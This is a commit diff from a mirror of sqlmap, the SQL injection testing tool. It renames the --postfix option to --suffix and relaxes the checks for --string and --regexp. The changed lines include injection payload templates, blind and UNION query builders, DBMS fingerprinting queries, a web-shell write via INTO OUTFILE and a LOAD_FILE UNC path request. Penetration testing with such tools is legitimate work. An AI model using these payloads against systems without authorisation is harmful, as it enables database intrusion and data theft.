sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 01:26:42 +03:00
Code Issues Packages Projects Releases Wiki Activity

Proper english (--postfix is now --suffix) and --string/--regexp does not necessarily need to match into the original response body, it might well be in the injected True condition only!

Browse Source
This commit is contained in:
Bernardo Damele 2010-11-17 22:00:09 +00:00
parent ca5125bbe0
commit 17486e472a
20 changed files with 77 additions and 78 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
doc/THANKS
View File

@ -213,7 +213,7 @@ Gabriel Lima <pato@bugnet.com.br>
for reporting a couple of bugs
Mark Lowe <larkmowe@gmail.com>
for reporting a bug
for reporting a couple of bugs
Truong Duc Luong <luongductruong@gmail.com>
for reporting a minor bug

59
lib/controller/checks.py
View File

@ -52,15 +52,15 @@ def checkSqlInjection(place, parameter, value, parenthesis):
randInt = randomInt()
randStr = randomStr()
prefix = ""
postfix = ""
suffix = ""
retVal = None
if conf.prefix or conf.postfix:
if conf.prefix or conf.suffix:
if conf.prefix:
prefix = conf.prefix
if conf.postfix:
postfix = conf.postfix
if conf.suffix:
suffix = conf.suffix
for case in kb.injections.root.case:
conf.matchRatio = None
@ -68,7 +68,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
positive = case.test.positive
negative = case.test.negative
if not prefix and not postfix and case.name == "custom":
if not prefix and not suffix and case.name == "custom":
continue
infoMsg = "testing %s (%s) injection " % (case.desc, logic)
@ -116,16 +116,16 @@ def heuristicCheckSqlInjection(place, parameter, value):
return
prefix = ""
postfix = ""
suffix = ""
if conf.prefix or conf.postfix:
if conf.prefix or conf.suffix:
if conf.prefix:
prefix = conf.prefix
if conf.postfix:
postfix = conf.postfix
if conf.suffix:
suffix = conf.suffix
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), postfix)
payload = "%s%s%s%s" % (value, prefix, randomStr(length=10, alphabet=['"', '\'', ')', '(']), suffix)
payload = agent.payload(place, parameter, value, payload)
Request.queryPage(payload, place, raise404=False)
result = wasLastRequestDBMSError()
@ -209,15 +209,15 @@ def checkDynamicContent(firstPage, secondPage):
for i in xrange(len(blocks) - 1):
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
postfix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
if prefix is None and blocks[i + 1][0] == 0:
continue
if postfix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
continue
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(postfix[:conf.dynMarkLength]) if postfix else None))
kb.dynamicMarkings.append((re.escape(prefix[-conf.dynMarkLength:]) if prefix else None, re.escape(suffix[:conf.dynMarkLength]) if suffix else None))
if len(kb.dynamicMarkings) > 0:
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
@ -225,14 +225,14 @@ def checkDynamicContent(firstPage, secondPage):
if conf.seqMatcher.a:
for item in kb.dynamicMarkings:
prefix, postfix = item
prefix, suffix = item
if prefix is None:
conf.seqMatcher.a = re.sub('(?s)^.+%s' % postfix, postfix, conf.seqMatcher.a)
elif postfix is None:
conf.seqMatcher.a = re.sub('(?s)^.+%s' % suffix, suffix, conf.seqMatcher.a)
elif suffix is None:
conf.seqMatcher.a = re.sub('(?s)%s.+$' % prefix, prefix, conf.seqMatcher.a)
else:
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), conf.seqMatcher.a)
conf.seqMatcher.a = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), conf.seqMatcher.a)
def checkStability():
"""
@ -347,14 +347,14 @@ def checkString():
if conf.string in page:
setString()
return True
else:
errMsg = "you provided '%s' as the string to " % conf.string
errMsg += "match, but such a string is not within the target "
errMsg += "URL page content, please provide another string."
logger.error(errMsg)
warnMsg = "you provided '%s' as the string to " % conf.string
warnMsg += "match, but such a string is not within the target "
warnMsg += "URL page content original request, sqlmap will "
warnMsg += "keep going anyway"
logger.warn(warnMsg)
return False
return True
def checkRegexp():
if not conf.regexp:
@ -377,15 +377,14 @@ def checkRegexp():
if re.search(conf.regexp, page, re.I | re.M):
setRegexp()
return True
else:
errMsg = "you provided '%s' as the regular expression to " % conf.regexp
errMsg += "match, but such a regular expression does not have any "
errMsg += "match within the target URL page content, please provide "
errMsg += "another regular expression."
logger.error(errMsg)
warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
warnMsg += "match, but such a regular expression does not have any "
warnMsg += "match within the target URL page content, sqlmap "
warnMsg += "will keep going anyway"
logger.warn(warnMsg)
return False
return True
def checkNullConnection():
"""

14
lib/core/agent.py
View File

@ -120,7 +120,7 @@ class Agent:
return self.payloadDirect(query)
query = self.prefixQuery(query)
query = self.postfixQuery(query)
query = self.suffixQuery(query)
payload = self.payload(newValue=query)
return payload
@ -156,7 +156,7 @@ class Agent:
return query
def postfixQuery(self, string, comment=None):
def suffixQuery(self, string, comment=None):
"""
This method appends the DBMS comment to the
SQL injection request
@ -182,10 +182,10 @@ class Agent:
if comment:
string += comment
if conf.postfix:
string += " %s" % conf.postfix
if conf.suffix:
string += " %s" % conf.suffix
else:
string += case.usage.postfix.format % eval(case.usage.postfix.params)
string += case.usage.suffix.format % eval(case.usage.suffix.params)
return string
@ -499,7 +499,7 @@ class Agent:
if intoRegExp:
inbandQuery += intoRegExp
inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment)
inbandQuery = self.suffixQuery(inbandQuery, kb.unionComment)
return inbandQuery
@ -636,7 +636,7 @@ class Agent:
regObj = getCompiledRegex("(?P<result>%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
for match in regObj.finditer(inpStr):
retVal = retVal.replace(match.group("result"), urlencode(match.group("result").strip(PAYLOAD_DELIMITER), convall=True))
retVal = retVal.replace(match.group("result"), match.group("result").strip(PAYLOAD_DELIMITER))
else:
retVal = retVal.replace(PAYLOAD_DELIMITER, '')

2
lib/core/optiondict.py
View File

@ -58,7 +58,7 @@ optDict = {
"dbms": "string",
"os": "string",
"prefix": "string",
"postfix": "string",
"suffix": "string",
"tamper": "string"
},

4
lib/parse/cmdline.py
View File

@ -169,8 +169,8 @@ def cmdLineParser():
injection.add_option("--prefix", dest="prefix",
help="Injection payload prefix string")
injection.add_option("--postfix", dest="postfix",
help="Injection payload postfix string")
injection.add_option("--suffix", dest="suffix",
help="Injection payload suffix string")
injection.add_option("--tamper", dest="tamper",
help="Use given script(s) for tampering injection data")

8
lib/request/comparison.py
View File

@ -60,14 +60,14 @@ def comparison(page, headers=None, getSeqMatcher=False, pageLength=None):
# Dynamic content lines to be excluded before comparison
if not kb.nullConnection and not conf.longestCommon:
for item in kb.dynamicMarkings:
prefix, postfix = item
prefix, suffix = item
if prefix is None:
page = re.sub('(?s)^.+%s' % postfix, postfix, page)
elif postfix is None:
page = re.sub('(?s)^.+%s' % suffix, suffix, page)
elif suffix is None:
page = re.sub('(?s)%s.+$' % prefix, prefix, page)
else:
page = re.sub('(?s)%s.+%s' % (prefix, postfix), '%s%s' % (prefix, postfix), page)
page = re.sub('(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
if not pageLength:
pageLength = len(page)

4
lib/request/inject.py
View File

@ -99,7 +99,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
"""
query = agent.prefixQuery(queries[kb.misc.testedDbms].inference.query)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
count = None
startLimit = 0
@ -398,7 +398,7 @@ def goStacked(expression, silent=False):
comment = queries[kb.dbms].comment.query
query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s;%s" % (query, comment))
query = agent.suffixQuery("%s;%s" % (query, comment))
debugMsg = "query: %s" % query
logger.debug(debugMsg)

2
lib/takeover/web.py
View File

@ -99,7 +99,7 @@ class Web:
query = "LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
query = agent.prefixQuery(query)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
return page

4
lib/techniques/blind/inference.py
View File

@ -442,7 +442,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# One-shot query containing equals commonValue
testValue = unescaper.unescape("'%s'" % commonValue) if "'" not in commonValue else unescaper.unescape("%s" % commonValue, quote=False)
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
queriesCount[0] += 1
result = Request.queryPage(agent.payload(newValue=query))
@ -466,7 +466,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
subquery = queries[kb.dbms].substring.query % (expressionUnescaped, 1, len(commonPattern))
testValue = unescaper.unescape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.unescape("%s" % commonPattern, quote=False)
query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
queriesCount[0] += 1
result = Request.queryPage(agent.payload(newValue=query))

2
lib/techniques/blind/timebased.py
View File

@ -28,7 +28,7 @@ def timeTest():
timeQuery = getDelayQuery(andCond=True)
query = agent.prefixQuery("AND %s" % timeQuery)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
start = time.time()
_ = Request.queryPage(payload)

6
lib/techniques/brute/use.py
View File

@ -38,7 +38,7 @@ def tableExists(tableFile):
if conf.db and '(*)' not in conf.db:
table = "%s.%s" % (conf.db, table)
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %d FROM %s)", (randomInt(1), table)))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
result = Request.queryPage(agent.payload(newValue=query))
if result:
@ -89,7 +89,7 @@ def columnExists(columnFile):
for column in columns:
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s)", (column, table)))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
result = Request.queryPage(agent.payload(newValue=query))
if result:
@ -114,7 +114,7 @@ def columnExists(columnFile):
for column in retVal:
query = agent.prefixQuery("%s" % safeStringFormat("AND EXISTS(SELECT %s FROM %s WHERE %s>0)", (column, table, column)))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
result = Request.queryPage(agent.payload(newValue=query))
if result:

2
lib/techniques/error/use.py
View File

@ -40,7 +40,7 @@ def errorUse(expression, returnPayload=False):
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(queries[kb.misc.testedDbms].error.query)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
startLimiter = ""
endLimiter = ""

4
lib/techniques/inband/union/test.py
View File

@ -128,7 +128,7 @@ def __unionTestByNULLBruteforce(comment, negative=False, falseCond=False):
if kb.dbms == DBMS.ORACLE:
query += " FROM DUAL"
commentedQuery = agent.postfixQuery(query, comment)
commentedQuery = agent.suffixQuery(query, comment)
payload = agent.payload(newValue=commentedQuery, negative=negative, falseCond=falseCond)
test, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
@ -145,7 +145,7 @@ def __unionTestByOrderBy(comment, negative=False, falseCond=False):
for count in range(1, conf.uCols+2):
query = agent.prefixQuery("ORDER BY %d" % count)
orderByQuery = agent.postfixQuery(query, comment)
orderByQuery = agent.suffixQuery(query, comment)
payload = agent.payload(newValue=orderByQuery, negative=negative, falseCond=falseCond)
_, seqMatcher = Request.queryPage(payload, getSeqMatcher=True)

4
lib/utils/parenthesis.py
View File

@ -37,7 +37,7 @@ def checkForParenthesis():
if kb.parenthesis is not None:
return
if conf.prefix or conf.postfix:
if conf.prefix or conf.suffix:
kb.parenthesis = 0
return
@ -46,7 +46,7 @@ def checkForParenthesis():
randStr = randomStr()
query = case.usage.prefix.format % eval(case.usage.prefix.params)
query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
query = query[:-1] + case.usage.suffix.format % eval(case.usage.suffix.params)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

6
plugins/dbms/access/fingerprint.py
View File

@ -41,7 +41,7 @@ class Fingerprint(GenericFingerprint):
table = "MSysAccessStorage"
if table:
query = agent.prefixQuery("AND EXISTS(SELECT CURDIR() FROM %s)" % table)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
retVal = "not sandboxed" if result else "sandboxed"
@ -71,7 +71,7 @@ class Fingerprint(GenericFingerprint):
table = table[1:]
randInt = randomInt()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s WHERE %d=%d)" % (table, randInt, randInt))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
if result is None:
@ -95,7 +95,7 @@ class Fingerprint(GenericFingerprint):
randInt = randomInt()
randStr = randomStr()
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload, content=True)

6
plugins/dbms/maxdb/fingerprint.py
View File

@ -35,7 +35,7 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
query = agent.prefixQuery("/* NoValue */")
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -49,7 +49,7 @@ class Fingerprint(GenericFingerprint):
for version in [6, 7]:
query = agent.prefixQuery("AND (SELECT MAJORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint):
for version in xrange(0, 10):
query = agent.prefixQuery("AND (SELECT MINORVERSION FROM SYSINFO.VERSION)=%d" % version)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

4
plugins/dbms/mysql/fingerprint.py
View File

@ -36,7 +36,7 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
query = agent.prefixQuery("/* NoValue */")
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)
@ -66,7 +66,7 @@ class Fingerprint(GenericFingerprint):
randInt = randomInt()
version = getUnicode(version)
query = agent.prefixQuery("/*!%s AND %d=%d*/" % (version, randInt, randInt + 1))
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

2
plugins/dbms/mysql/takeover.py
View File

@ -102,7 +102,7 @@ class Takeover(GenericTakeover):
def uncPathRequest(self):
if not kb.stackedTest:
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
query = agent.postfixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
Request.queryPage(payload)

4
sqlmap.conf
View File

@ -181,8 +181,8 @@ os =
# Injection payload prefix string
prefix =
# Injection payload postfix string
postfix =
# Injection payload suffix string
suffix =
# Use given script(s) for tampering injection data
tamper =

16
xml/injections.xml
View File

@ -3,12 +3,12 @@
<root>
<case name="custom" desc="custom">
<test>
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, logic, &quot;(&quot; * parenthesis, randInt, randInt, postfix"/>
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, logic, &quot;(&quot; * parenthesis, randInt, randInt + 1, postfix"/>
<positive format="%s%s%s %s %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, logic, &quot;(&quot; * parenthesis, randInt, randInt, suffix"/>
<negative format="%s%s%s %s %s%d=%d %s" params="value, prefix, &quot;)&quot; * parenthesis, logic, &quot;(&quot; * parenthesis, randInt, randInt + 1, suffix"/>
</test>
<usage>
<prefix format="%s " params="')' * parenthesis"/>
<postfix format=" %s %s" params="logic, '(' * parenthesis"/>
<suffix format=" %s %s" params="logic, '(' * parenthesis"/>
</usage>
</case>
<case name="numeric" desc="unescaped numeric">
@ -18,7 +18,7 @@
</test>
<usage>
<prefix format="%s " params="')' * parenthesis"/>
<postfix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
<suffix format=" %s %s%d=%d" params="logic, '(' * parenthesis, randInt, randInt"/>
</usage>
</case>
<case name="stringsingle" desc="single quoted string">
@ -28,7 +28,7 @@
</test>
<usage>
<prefix format="'%s " params="')' * parenthesis"/>
<postfix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
<suffix format=" %s %s'%s'='%s" params="logic, '(' * parenthesis, randStr, randStr"/>
</usage>
</case>
<case name="likesingle" desc="LIKE single quoted string">
@ -38,7 +38,7 @@
</test>
<usage>
<prefix format="'%s " params="')' * parenthesis"/>
<postfix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
<suffix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
</usage>
</case>
<case name="stringdouble" desc="double quoted string">
@ -48,7 +48,7 @@
</test>
<usage>
<prefix format="&quot;%s " params="')' * parenthesis"/>
<postfix format=" %s %s&quot;%s&quot;=&quot;%s" params="logic, '(' * parenthesis, randStr, randStr"/>
<suffix format=" %s %s&quot;%s&quot;=&quot;%s" params="logic, '(' * parenthesis, randStr, randStr"/>
</usage>
</case>
<case name="likedouble" desc="LIKE double quoted string">
@ -58,7 +58,7 @@
</test>
<usage>
<prefix format="&quot;%s " params="')' * parenthesis"/>
<postfix format=" %s %s&quot;%s&quot; LIKE &quot;%s" params="logic, '(' * parenthesis, randStr, randStr"/>
<suffix format=" %s %s&quot;%s&quot; LIKE &quot;%s" params="logic, '(' * parenthesis, randStr, randStr"/>
</usage>
</case>
</root>